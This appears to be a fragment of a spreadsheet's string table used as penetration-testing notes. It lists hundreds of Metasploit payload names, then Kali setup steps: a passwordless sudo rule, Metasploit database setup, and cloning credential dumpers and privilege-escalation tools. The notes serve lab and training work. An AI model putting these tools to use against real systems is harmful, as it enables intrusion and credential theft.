    <t>linux/x64/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/x64/pingback_bind_tcp</t>
  </si>
  <si>
    <t>linux/x64/pingback_reverse_tcp</t>
  </si>
  <si>
    <t>linux/x64/shell/bind_tcp</t>
  </si>
  <si>
    <t>linux/x64/shell/reverse_tcp</t>
  </si>
  <si>
    <t>linux/x64/shell_bind_ipv6_tcp</t>
  </si>
  <si>
    <t>linux/x64/shell_bind_tcp</t>
  </si>
  <si>
    <t>linux/x64/shell_bind_tcp_random_port</t>
  </si>
  <si>
    <t>linux/x64/shell_find_port</t>
  </si>
  <si>
    <t>linux/x64/shell_reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>linux/x64/shell_reverse_tcp</t>
  </si>
  <si>
    <t>linux/x86/adduser</t>
  </si>
  <si>
    <t>linux/x86/chmod</t>
  </si>
  <si>
    <t>linux/x86/meterpreter/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>linux/x86/meterpreter/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>linux/x86/meterpreter/bind_nonx_tcp</t>
  </si>
  <si>
    <t>linux/x86/meterpreter/bind_tcp</t>
  </si>
  <si>
    <t>linux/x86/meterpreter/bind_tcp_uuid</t>
  </si>
  <si>
    <t>linux/x86/meterpreter/find_tag</t>
  </si>
  <si>
    <t>linux/x86/meterpreter/reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>linux/x86/meterpreter/reverse_nonx_tcp</t>
  </si>
  <si>
    <t>linux/x86/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>linux/x86/meterpreter/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>linux/x86/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/x86/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/x86/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>linux/x86/metsvc_bind_tcp</t>
  </si>
  <si>
    <t>linux/x86/metsvc_reverse_tcp</t>
  </si>
  <si>
    <t>linux/x86/read_file</t>
  </si>
  <si>
    <t>linux/x86/shell/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>linux/x86/shell/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>linux/x86/shell/bind_nonx_tcp</t>
  </si>
  <si>
    <t>linux/x86/shell/bind_tcp</t>
  </si>
  <si>
    <t>linux/x86/shell/bind_tcp_uuid</t>
  </si>
  <si>
    <t>linux/x86/shell/find_tag</t>
  </si>
  <si>
    <t>linux/x86/shell/reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>linux/x86/shell/reverse_nonx_tcp</t>
  </si>
  <si>
    <t>linux/x86/shell/reverse_tcp</t>
  </si>
  <si>
    <t>linux/x86/shell/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>linux/x86/shell_bind_ipv6_tcp</t>
  </si>
  <si>
    <t>linux/x86/shell_bind_tcp</t>
  </si>
  <si>
    <t>linux/x86/shell_bind_tcp_random_port</t>
  </si>
  <si>
    <t>linux/x86/shell_find_port</t>
  </si>
  <si>
    <t>linux/x86/shell_find_tag</t>
  </si>
  <si>
    <t>linux/x86/shell_reverse_tcp</t>
  </si>
  <si>
    <t>linux/x86/shell_reverse_tcp_ipv6</t>
  </si>
  <si>
    <t>linux/zarch/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>linux/zarch/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>linux/zarch/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>mainframe/shell_reverse_tcp</t>
  </si>
  <si>
    <t>multi/meterpreter/reverse_http</t>
  </si>
  <si>
    <t>multi/meterpreter/reverse_https</t>
  </si>
  <si>
    <t>netware/shell/reverse_tcp</t>
  </si>
  <si>
    <t>nodejs/shell_bind_tcp</t>
  </si>
  <si>
    <t>nodejs/shell_reverse_tcp</t>
  </si>
  <si>
    <t>nodejs/shell_reverse_tcp_ssl</t>
  </si>
  <si>
    <t>osx/armle/execute/bind_tcp</t>
  </si>
  <si>
    <t>osx/armle/execute/reverse_tcp</t>
  </si>
  <si>
    <t>osx/armle/shell/bind_tcp</t>
  </si>
  <si>
    <t>osx/armle/shell/reverse_tcp</t>
  </si>
  <si>
    <t>osx/armle/shell_bind_tcp</t>
  </si>
  <si>
    <t>osx/armle/shell_reverse_tcp</t>
  </si>
  <si>
    <t>osx/armle/vibrate</t>
  </si>
  <si>
    <t>osx/ppc/shell/bind_tcp</t>
  </si>
  <si>
    <t>osx/ppc/shell/find_tag</t>
  </si>
  <si>
    <t>osx/ppc/shell/reverse_tcp</t>
  </si>
  <si>
    <t>osx/ppc/shell_bind_tcp</t>
  </si>
  <si>
    <t>osx/ppc/shell_reverse_tcp</t>
  </si>
  <si>
    <t>osx/x64/dupandexecve/bind_tcp</t>
  </si>
  <si>
    <t>osx/x64/dupandexecve/reverse_tcp</t>
  </si>
  <si>
    <t>osx/x64/dupandexecve/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>osx/x64/exec</t>
  </si>
  <si>
    <t>osx/x64/meterpreter/bind_tcp</t>
  </si>
  <si>
    <t>osx/x64/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>osx/x64/meterpreter/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>osx/x64/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>osx/x64/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>osx/x64/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>osx/x64/say</t>
  </si>
  <si>
    <t>osx/x64/shell_bind_tcp</t>
  </si>
  <si>
    <t>osx/x64/shell_find_tag</t>
  </si>
  <si>
    <t>osx/x64/shell_reverse_tcp</t>
  </si>
  <si>
    <t>osx/x86/bundleinject/bind_tcp</t>
  </si>
  <si>
    <t>osx/x86/bundleinject/reverse_tcp</t>
  </si>
  <si>
    <t>osx/x86/exec</t>
  </si>
  <si>
    <t>osx/x86/isight/bind_tcp</t>
  </si>
  <si>
    <t>osx/x86/isight/reverse_tcp</t>
  </si>
  <si>
    <t>osx/x86/shell_bind_tcp</t>
  </si>
  <si>
    <t>osx/x86/shell_find_port</t>
  </si>
  <si>
    <t>osx/x86/shell_reverse_tcp</t>
  </si>
  <si>
    <t>osx/x86/vforkshell/bind_tcp</t>
  </si>
  <si>
    <t>osx/x86/vforkshell/reverse_tcp</t>
  </si>
  <si>
    <t>osx/x86/vforkshell_bind_tcp</t>
  </si>
  <si>
    <t>osx/x86/vforkshell_reverse_tcp</t>
  </si>
  <si>
    <t>php/bind_perl</t>
  </si>
  <si>
    <t>php/bind_perl_ipv6</t>
  </si>
  <si>
    <t>php/bind_php</t>
  </si>
  <si>
    <t>php/bind_php_ipv6</t>
  </si>
  <si>
    <t>php/download_exec</t>
  </si>
  <si>
    <t>php/exec</t>
  </si>
  <si>
    <t>php/meterpreter/bind_tcp</t>
  </si>
  <si>
    <t>php/meterpreter/bind_tcp_ipv6</t>
  </si>
  <si>
    <t>php/meterpreter/bind_tcp_ipv6_uuid</t>
  </si>
  <si>
    <t>php/meterpreter/bind_tcp_uuid</t>
  </si>
  <si>
    <t>php/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>php/meterpreter/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>php/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>php/reverse_perl</t>
  </si>
  <si>
    <t>php/reverse_php</t>
  </si>
  <si>
    <t>php/shell_findsock</t>
  </si>
  <si>
    <t>python/meterpreter/bind_tcp</t>
  </si>
  <si>
    <t>python/meterpreter/bind_tcp_uuid</t>
  </si>
  <si>
    <t>python/meterpreter/reverse_http</t>
  </si>
  <si>
    <t>python/meterpreter/reverse_https</t>
  </si>
  <si>
    <t>python/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>python/meterpreter/reverse_tcp_ssl</t>
  </si>
  <si>
    <t>python/meterpreter/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>python/meterpreter_bind_tcp</t>
  </si>
  <si>
    <t>python/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>python/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>python/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>python/pingback_bind_tcp</t>
  </si>
  <si>
    <t>python/pingback_reverse_tcp</t>
  </si>
  <si>
    <t>python/shell_bind_tcp</t>
  </si>
  <si>
    <t>python/shell_reverse_tcp</t>
  </si>
  <si>
    <t>python/shell_reverse_tcp_ssl</t>
  </si>
  <si>
    <t>python/shell_reverse_udp</t>
  </si>
  <si>
    <t>r/shell_bind_tcp</t>
  </si>
  <si>
    <t>r/shell_reverse_tcp</t>
  </si>
  <si>
    <t>ruby/pingback_bind_tcp</t>
  </si>
  <si>
    <t>ruby/pingback_reverse_tcp</t>
  </si>
  <si>
    <t>ruby/shell_bind_tcp</t>
  </si>
  <si>
    <t>ruby/shell_bind_tcp_ipv6</t>
  </si>
  <si>
    <t>ruby/shell_reverse_tcp</t>
  </si>
  <si>
    <t>ruby/shell_reverse_tcp_ssl</t>
  </si>
  <si>
    <t>solaris/sparc/shell_bind_tcp</t>
  </si>
  <si>
    <t>solaris/sparc/shell_find_port</t>
  </si>
  <si>
    <t>solaris/sparc/shell_reverse_tcp</t>
  </si>
  <si>
    <t>solaris/x86/shell_bind_tcp</t>
  </si>
  <si>
    <t>solaris/x86/shell_find_port</t>
  </si>
  <si>
    <t>solaris/x86/shell_reverse_tcp</t>
  </si>
  <si>
    <t>tty/unix/interact</t>
  </si>
  <si>
    <t>windows/adduser</t>
  </si>
  <si>
    <t>windows/dllinject/bind_hidden_ipknock_tcp</t>
  </si>
  <si>
    <t>windows/dllinject/bind_hidden_tcp</t>
  </si>
  <si>
    <t>windows/dllinject/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/dllinject/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>windows/dllinject/bind_named_pipe</t>
  </si>
  <si>
    <t>windows/dllinject/bind_nonx_tcp</t>
  </si>
  <si>
    <t>windows/dllinject/bind_tcp</t>
  </si>
  <si>
    <t>windows/dllinject/bind_tcp_rc4</t>
  </si>
  <si>
    <t>windows/dllinject/bind_tcp_uuid</t>
  </si>
  <si>
    <t>windows/dllinject/find_tag</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_hop_http</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_http</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_http_proxy_pstore</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_nonx_tcp</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_ord_tcp</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_tcp</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_tcp_allports</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_tcp_dns</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_tcp_rc4</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_tcp_rc4_dns</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>windows/dllinject/reverse_winhttp</t>
  </si>
  <si>
    <t>windows/dns_txt_query_exec</t>
  </si>
  <si>
    <t>windows/download_exec</t>
  </si>
  <si>
    <t>windows/encrypted_shell/reverse_tcp</t>
  </si>
  <si>
    <t>windows/encrypted_shell_reverse_tcp</t>
  </si>
  <si>
    <t>windows/exec</t>
  </si>
  <si>
    <t>windows/format_all_drives</t>
  </si>
  <si>
    <t>windows/loadlibrary</t>
  </si>
  <si>
    <t>windows/messagebox</t>
  </si>
  <si>
    <t>windows/meterpreter/bind_hidden_ipknock_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter/bind_hidden_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>windows/meterpreter/bind_named_pipe</t>
  </si>
  <si>
    <t>windows/meterpreter/bind_nonx_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter/bind_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter/bind_tcp_rc4</t>
  </si>
  <si>
    <t>windows/meterpreter/bind_tcp_uuid</t>
  </si>
  <si>
    <t>windows/meterpreter/find_tag</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_hop_http</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_http</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_http_proxy_pstore</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_https</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_https_proxy</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_named_pipe</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_nonx_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_ord_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_tcp_allports</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_tcp_dns</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_tcp_rc4</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_tcp_rc4_dns</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_winhttp</t>
  </si>
  <si>
    <t>windows/meterpreter/reverse_winhttps</t>
  </si>
  <si>
    <t>windows/meterpreter_bind_named_pipe</t>
  </si>
  <si>
    <t>windows/meterpreter_bind_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>windows/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>windows/meterpreter_reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>windows/metsvc_bind_tcp</t>
  </si>
  <si>
    <t>windows/metsvc_reverse_tcp</t>
  </si>
  <si>
    <t>windows/patchupdllinject/bind_hidden_ipknock_tcp</t>
  </si>
  <si>
    <t>windows/patchupdllinject/bind_hidden_tcp</t>
  </si>
  <si>
    <t>windows/patchupdllinject/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/patchupdllinject/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>windows/patchupdllinject/bind_named_pipe</t>
  </si>
  <si>
    <t>windows/patchupdllinject/bind_nonx_tcp</t>
  </si>
  <si>
    <t>windows/patchupdllinject/bind_tcp</t>
  </si>
  <si>
    <t>windows/patchupdllinject/bind_tcp_rc4</t>
  </si>
  <si>
    <t>windows/patchupdllinject/bind_tcp_uuid</t>
  </si>
  <si>
    <t>windows/patchupdllinject/find_tag</t>
  </si>
  <si>
    <t>windows/patchupdllinject/reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/patchupdllinject/reverse_nonx_tcp</t>
  </si>
  <si>
    <t>windows/patchupdllinject/reverse_ord_tcp</t>
  </si>
  <si>
    <t>windows/patchupdllinject/reverse_tcp</t>
  </si>
  <si>
    <t>windows/patchupdllinject/reverse_tcp_allports</t>
  </si>
  <si>
    <t>windows/patchupdllinject/reverse_tcp_dns</t>
  </si>
  <si>
    <t>windows/patchupdllinject/reverse_tcp_rc4</t>
  </si>
  <si>
    <t>windows/patchupdllinject/reverse_tcp_rc4_dns</t>
  </si>
  <si>
    <t>windows/patchupdllinject/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/bind_hidden_ipknock_tcp</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/bind_hidden_tcp</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/bind_named_pipe</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/bind_nonx_tcp</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/bind_tcp</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/bind_tcp_rc4</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/bind_tcp_uuid</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/find_tag</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/reverse_nonx_tcp</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/reverse_ord_tcp</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/reverse_tcp_allports</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/reverse_tcp_dns</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/reverse_tcp_rc4</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/reverse_tcp_rc4_dns</t>
  </si>
  <si>
    <t>windows/patchupmeterpreter/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>windows/pingback_bind_tcp</t>
  </si>
  <si>
    <t>windows/pingback_reverse_tcp</t>
  </si>
  <si>
    <t>windows/powershell_bind_tcp</t>
  </si>
  <si>
    <t>windows/powershell_reverse_tcp</t>
  </si>
  <si>
    <t>windows/shell/bind_hidden_ipknock_tcp</t>
  </si>
  <si>
    <t>windows/shell/bind_hidden_tcp</t>
  </si>
  <si>
    <t>windows/shell/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/shell/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>windows/shell/bind_named_pipe</t>
  </si>
  <si>
    <t>windows/shell/bind_nonx_tcp</t>
  </si>
  <si>
    <t>windows/shell/bind_tcp</t>
  </si>
  <si>
    <t>windows/shell/bind_tcp_rc4</t>
  </si>
  <si>
    <t>windows/shell/bind_tcp_uuid</t>
  </si>
  <si>
    <t>windows/shell/find_tag</t>
  </si>
  <si>
    <t>windows/shell/reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/shell/reverse_nonx_tcp</t>
  </si>
  <si>
    <t>windows/shell/reverse_ord_tcp</t>
  </si>
  <si>
    <t>windows/shell/reverse_tcp</t>
  </si>
  <si>
    <t>windows/shell/reverse_tcp_allports</t>
  </si>
  <si>
    <t>windows/shell/reverse_tcp_dns</t>
  </si>
  <si>
    <t>windows/shell/reverse_tcp_rc4</t>
  </si>
  <si>
    <t>windows/shell/reverse_tcp_rc4_dns</t>
  </si>
  <si>
    <t>windows/shell/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>windows/shell/reverse_udp</t>
  </si>
  <si>
    <t>windows/shell_bind_tcp</t>
  </si>
  <si>
    <t>windows/shell_bind_tcp_xpfw</t>
  </si>
  <si>
    <t>windows/shell_hidden_bind_tcp</t>
  </si>
  <si>
    <t>windows/shell_reverse_tcp</t>
  </si>
  <si>
    <t>windows/speak_pwned</t>
  </si>
  <si>
    <t>windows/upexec/bind_hidden_ipknock_tcp</t>
  </si>
  <si>
    <t>windows/upexec/bind_hidden_tcp</t>
  </si>
  <si>
    <t>windows/upexec/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/upexec/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>windows/upexec/bind_named_pipe</t>
  </si>
  <si>
    <t>windows/upexec/bind_nonx_tcp</t>
  </si>
  <si>
    <t>windows/upexec/bind_tcp</t>
  </si>
  <si>
    <t>windows/upexec/bind_tcp_rc4</t>
  </si>
  <si>
    <t>windows/upexec/bind_tcp_uuid</t>
  </si>
  <si>
    <t>windows/upexec/find_tag</t>
  </si>
  <si>
    <t>windows/upexec/reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/upexec/reverse_nonx_tcp</t>
  </si>
  <si>
    <t>windows/upexec/reverse_ord_tcp</t>
  </si>
  <si>
    <t>windows/upexec/reverse_tcp</t>
  </si>
  <si>
    <t>windows/upexec/reverse_tcp_allports</t>
  </si>
  <si>
    <t>windows/upexec/reverse_tcp_dns</t>
  </si>
  <si>
    <t>windows/upexec/reverse_tcp_rc4</t>
  </si>
  <si>
    <t>windows/upexec/reverse_tcp_rc4_dns</t>
  </si>
  <si>
    <t>windows/upexec/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>windows/upexec/reverse_udp</t>
  </si>
  <si>
    <t>windows/vncinject/bind_hidden_ipknock_tcp</t>
  </si>
  <si>
    <t>windows/vncinject/bind_hidden_tcp</t>
  </si>
  <si>
    <t>windows/vncinject/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/vncinject/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>windows/vncinject/bind_named_pipe</t>
  </si>
  <si>
    <t>windows/vncinject/bind_nonx_tcp</t>
  </si>
  <si>
    <t>windows/vncinject/bind_tcp</t>
  </si>
  <si>
    <t>windows/vncinject/bind_tcp_rc4</t>
  </si>
  <si>
    <t>windows/vncinject/bind_tcp_uuid</t>
  </si>
  <si>
    <t>windows/vncinject/find_tag</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_hop_http</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_http</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_http_proxy_pstore</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_nonx_tcp</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_ord_tcp</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_tcp</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_tcp_allports</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_tcp_dns</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_tcp_rc4</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_tcp_rc4_dns</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>windows/vncinject/reverse_winhttp</t>
  </si>
  <si>
    <t>windows/x64/encrypted_shell/reverse_tcp</t>
  </si>
  <si>
    <t>windows/x64/encrypted_shell_reverse_tcp</t>
  </si>
  <si>
    <t>windows/x64/exec</t>
  </si>
  <si>
    <t>windows/x64/loadlibrary</t>
  </si>
  <si>
    <t>windows/x64/messagebox</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/bind_named_pipe</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/bind_tcp</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/bind_tcp_rc4</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/bind_tcp_uuid</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/reverse_http</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/reverse_https</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/reverse_named_pipe</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/reverse_tcp_rc4</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/reverse_winhttp</t>
  </si>
  <si>
    <t>windows/x64/meterpreter/reverse_winhttps</t>
  </si>
  <si>
    <t>windows/x64/meterpreter_bind_named_pipe</t>
  </si>
  <si>
    <t>windows/x64/meterpreter_bind_tcp</t>
  </si>
  <si>
    <t>windows/x64/meterpreter_reverse_http</t>
  </si>
  <si>
    <t>windows/x64/meterpreter_reverse_https</t>
  </si>
  <si>
    <t>windows/x64/meterpreter_reverse_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/x64/meterpreter_reverse_tcp</t>
  </si>
  <si>
    <t>windows/x64/pingback_reverse_tcp</t>
  </si>
  <si>
    <t>windows/x64/powershell_bind_tcp</t>
  </si>
  <si>
    <t>windows/x64/powershell_reverse_tcp</t>
  </si>
  <si>
    <t>windows/x64/shell/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/x64/shell/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>windows/x64/shell/bind_named_pipe</t>
  </si>
  <si>
    <t>windows/x64/shell/bind_tcp</t>
  </si>
  <si>
    <t>windows/x64/shell/bind_tcp_rc4</t>
  </si>
  <si>
    <t>windows/x64/shell/bind_tcp_uuid</t>
  </si>
  <si>
    <t>windows/x64/shell/reverse_tcp</t>
  </si>
  <si>
    <t>windows/x64/shell/reverse_tcp_rc4</t>
  </si>
  <si>
    <t>windows/x64/shell/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>windows/x64/shell_bind_tcp</t>
  </si>
  <si>
    <t>windows/x64/shell_reverse_tcp</t>
  </si>
  <si>
    <t>windows/x64/vncinject/bind_ipv6_tcp</t>
  </si>
  <si>
    <t>windows/x64/vncinject/bind_ipv6_tcp_uuid</t>
  </si>
  <si>
    <t>windows/x64/vncinject/bind_named_pipe</t>
  </si>
  <si>
    <t>windows/x64/vncinject/bind_tcp</t>
  </si>
  <si>
    <t>windows/x64/vncinject/bind_tcp_rc4</t>
  </si>
  <si>
    <t>windows/x64/vncinject/bind_tcp_uuid</t>
  </si>
  <si>
    <t>windows/x64/vncinject/reverse_http</t>
  </si>
  <si>
    <t>windows/x64/vncinject/reverse_https</t>
  </si>
  <si>
    <t>windows/x64/vncinject/reverse_tcp</t>
  </si>
  <si>
    <t>windows/x64/vncinject/reverse_tcp_rc4</t>
  </si>
  <si>
    <t>windows/x64/vncinject/reverse_tcp_uuid</t>
  </si>
  <si>
    <t>windows/x64/vncinject/reverse_winhttp</t>
  </si>
  <si>
    <t>windows/x64/vncinject/reverse_winhttps</t>
  </si>
  <si>
    <t xml:space="preserve">Environment preparation </t>
  </si>
  <si>
    <t>Users and share folders</t>
  </si>
  <si>
    <t xml:space="preserve">Create a new user and add this line with visudo:
&lt;user&gt; ALL=(ALL) NOPASSWD: ALL
</t>
  </si>
  <si>
    <t xml:space="preserve">Mount a shared folder with the host OS (assumes vmware shared folder 'kali'):
sudo mkdir /mnt/kali &amp;&amp; sudo mount -t fuse.vmhgfs-fuse .host:/kali /mnt/kali -o allow_other
</t>
  </si>
  <si>
    <t xml:space="preserve">Set the share folder to automount by adding this line to /etc/fstab (there are tabs, don't let excel fool you):
.host:/kali	/mnt/kali	fuse.vmhgfs-fuse	defaults,allow_other	00
</t>
  </si>
  <si>
    <t>Services and architecture</t>
  </si>
  <si>
    <t xml:space="preserve">Enable postgresql for metasploit:
sudo systemctl enable postgresql &amp;&amp; sudo systemctl start postgresql &amp;&amp; sudo msfdb init 
</t>
  </si>
  <si>
    <t xml:space="preserve">Enable multiarch application support (adding 32 bit to 64 bit Kali):
sudo dpkg --add-architecture i386
</t>
  </si>
  <si>
    <t xml:space="preserve">Upgrade everything:
sudo apt update &amp;&amp; sudo apt upgrade -y &amp;&amp; sudo apt dist-upgrade -y &amp;&amp; searchsploit -update
</t>
  </si>
  <si>
    <t>Install applications</t>
  </si>
  <si>
    <t xml:space="preserve">sudo apt-get install kali-linux-large terminator seclists impacket-scripts ftp enum4linux snmpenum gobuster vsftpd libreoffice exploitdb mingw-w64 wine32 python3-pip atftpd rinetd gcc-multilib powershell-empire gedit gcc python-dev libkrb5-dev bloodhound ntpdate powercat libboost-dev libssl-dev libc6-dev:i386 oscanner smtp-user-enum snmp sslscan sipvicious tnscmd10g whatweb wkhtmltopdf -y
</t>
  </si>
  <si>
    <t xml:space="preserve">sudo gem install evil-winrm
</t>
  </si>
  <si>
    <t xml:space="preserve">mkdir ~/tools &amp;&amp; cd ~/tools &amp;&amp; git clone  https://github.com/huntergregal/mimipenguin &amp;&amp; git clone https://github.com/InteliSecureLabs/Linux_Exploit_Suggester &amp;&amp; git clone https://github.com/rebootuser/LinEnum &amp;&amp; git clone https://github.com/sleventyeleven/linuxprivchecker &amp;&amp; git clone https://github.com/pentestmonkey/windows-privesc-check &amp;&amp; git clone https://github.com/pentestmonkey/unix-privesc-check &amp;&amp; git clone https://github.com/spencerdodd/kernelpop &amp;&amp; git clone https://github.com/SecureAuthCorp/impacket/ &amp;&amp; git clone https://github.com/DominicBreuker/pspy &amp;&amp; git clone https://github.com/diego-treitos/linux-smart-enumeration/ &amp;&amp; git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite &amp;&amp; git clone https://github.com/Tib3rius/AutoRecon &amp;&amp; git clone https://github.com/nidem/kerberoast &amp;&amp; git clone https://github.com/BloodHoundAD/SharpHound3 &amp;&amp; git clone https://github.com/hausec/Bloodhound-Custom-Queries &amp;&amp; git clone https://github.com/robertdavidgraham/rdpscan &amp;&amp; git clone https://github.com/andrew-d/static-binaries &amp;&amp; git clone https://github.com/Flangvik/SharpCollection &amp;&amp; git clone https://github.com/BC-SECURITY/Invoke-PrintDemon &amp;&amp; git clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries &amp;&amp; git clone https://github.com/antonioCoco/RoguePotato
Don't forget to git clone any personal repositories that you might want
</t>
  </si>
  <si>
    <t xml:space="preserve">Grab latest mimikatz release from https://coderelease.io/github/repository/gentilkiwi/mimikatz
Also grab an older version (sporadic errors):
mkdir -p ~/tools/mimikats/2.1.1 &amp;&amp; wget https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip -o ~/tools/mimikats/2.1.1/mimikatz_trunk.zip
</t>
  </si>
  <si>
